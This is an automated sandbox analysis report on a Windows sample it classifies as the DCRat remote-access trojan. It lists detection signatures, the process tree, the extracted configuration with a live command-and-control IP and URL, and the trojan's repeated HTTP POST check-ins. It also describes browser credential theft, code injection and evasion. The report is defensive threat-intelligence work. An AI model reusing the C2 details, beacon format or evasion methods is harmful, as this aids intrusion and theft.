Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KyC6hVwU8Z.exe

Overview

General Information

Sample name:KyC6hVwU8Z.exe
renamed because original name is a hash value
Original sample name:a8c535490feb18fdff588d94c0d8a889.exe
Analysis ID:1572160
MD5:a8c535490feb18fdff588d94c0d8a889
SHA1:7e8660d2481014bdf84814273573b921202c67e6
SHA256:5f4e7c6f450d28136464acb431e1ec1be7812fc72f9eeede3b767f4e0194801b
Tags:exeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Contains functionality to inject code into remote processes
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KyC6hVwU8Z.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\KyC6hVwU8Z.exe" MD5: A8C535490FEB18FDFF588D94C0D8A889)
    • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KyC6hVwU8Z.exe (PID: 652 cmdline: "C:\Users\user\Desktop\KyC6hVwU8Z.exe" MD5: A8C535490FEB18FDFF588D94C0D8A889)
    • KyC6hVwU8Z.exe (PID: 2292 cmdline: "C:\Users\user\Desktop\KyC6hVwU8Z.exe" MD5: A8C535490FEB18FDFF588D94C0D8A889)
      • 7Up9zvGH4w.exe (PID: 2136 cmdline: "C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe" MD5: F3EDFF85DE5FD002692D54A04BCB1C09)
        • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • pPTyCqA3ru.exe (PID: 2132 cmdline: "C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe" MD5: 314420BAC969BCFB9510A0E8CC3686D6)
        • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 2568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 4816 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • PfjsOcNiQfAmiszo.exe (PID: 6180 cmdline: "C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe" MD5: 314420BAC969BCFB9510A0E8CC3686D6)
    • WerFault.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 268 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "false", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    0000000C.00000000.2794932818.0000000000052000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 3 entries
                      SourceRuleDescriptionAuthorStrings
                      6.2.KyC6hVwU8Z.exe.400000.2.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        6.2.KyC6hVwU8Z.exe.400000.2.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          6.2.KyC6hVwU8Z.exe.436080.3.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                            12.0.pPTyCqA3ru.exe.50000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                              6.2.KyC6hVwU8Z.exe.436080.3.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                                No Sigma rule has matched
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-10T07:33:14.232792+010020480951A Network Trojan was detected192.168.2.549867185.43.5.9380TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phpAvira URL Cloud: Label: malware
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\dFZxqctW.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: C:\Users\user\Desktop\luKnOVOf.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Users\user\Desktop\oUNDhiUw.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\yTUtFuTG.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                Source: 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "false", "13": "true", "14": "true"}}
                                Source: http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phpVirustotal: Detection: 11%Perma Link
                                Source: http://185.43.5.93Virustotal: Detection: 5%Perma Link
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeReversingLabs: Detection: 73%
                                Source: C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exeReversingLabs: Detection: 73%
                                Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\dFZxqctW.logReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\luKnOVOf.logReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\oUNDhiUw.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\yTUtFuTG.logReversingLabs: Detection: 70%
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeReversingLabs: Detection: 73%
                                Source: C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exeReversingLabs: Detection: 73%
                                Source: KyC6hVwU8Z.exeReversingLabs: Detection: 71%
                                Source: KyC6hVwU8Z.exeVirustotal: Detection: 50%Perma Link
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\oUNDhiUw.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\yTUtFuTG.logJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exeJoe Sandbox ML: detected
                                Source: KyC6hVwU8Z.exeJoe Sandbox ML: detected
                                Source: 12.0.pPTyCqA3ru.exe.50000.0.unpackString decryptor: ["QydFvL1QAJM6EFVw15nrocyyKvycAaWe2ErkIyFOxI7hX9jV4GtYtJ1xAp5AXZQkxsEAXvnDzY3gfRaKLdh3q7vtN3jd3F1Y1Wup5j7JdqiUPUStOuy31W4z6UwdLJJu","d9644a53c099b8ef069d97c7b0d2f65e85cf0cff3293cfd8bb62590e72fe2bea","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHRXbWhpU0U1c1NXbDNhVTFVVFdsUGFVb3dZMjVXYkVscGQybE5WRkZwVDJsS01HTnVWbXhKYmpBOUlsMD0iXQ=="]
                                Source: 12.0.pPTyCqA3ru.exe.50000.0.unpackString decryptor: [["http://185.43.5.93/5/4Datalife/asynccpu3Generator/","VmPipePollHttpgeoprocessserver"]]
                                Source: KyC6hVwU8Z.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\f6900929d627b7Jump to behavior
                                Source: KyC6hVwU8Z.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: mountvol.pdb source: KyC6hVwU8Z.exe, KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 7Up9zvGH4w.exe, 0000000A.00000000.2793610313.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe, 0000000A.00000002.2796201070.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe.6.dr
                                Source: Binary string: wC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mountvol.pdbGCTL source: KyC6hVwU8Z.exe, 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 7Up9zvGH4w.exe, 0000000A.00000000.2793610313.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe, 0000000A.00000002.2796201070.00007FF64C404000.00000002.00000001.01000000.00000006.sdmp, 7Up9zvGH4w.exe.6.dr
                                Source: Binary string: }C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb m^ source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_00200C97 FindFirstFileExW,0_2_00200C97
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_00200D48 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00200D48
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_00200C97 FindFirstFileExW,5_2_00200C97
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_00200D48 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00200D48
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0041B6EA FindFirstFileExW,6_2_0041B6EA
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 4x nop then jmp 00007FF849104AA8h12_2_00007FF849104560
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 4x nop then jmp 00007FF848F3C906h18_2_00007FF848F3C6ED
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 4x nop then jmp 00007FF84912209Bh18_2_00007FF849121CD0
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeCode function: 4x nop then dec eax18_2_00007FF849118FF1

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49867 -> 185.43.5.93:80
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 384Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: multipart/form-data; boundary=----6Bb2TGQW3wrvnAZPjUVj3vIvEUSrxVXwXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 15834Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 185.43.5.93Content-Length: 1048Expect: 100-continue
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.43.5.93
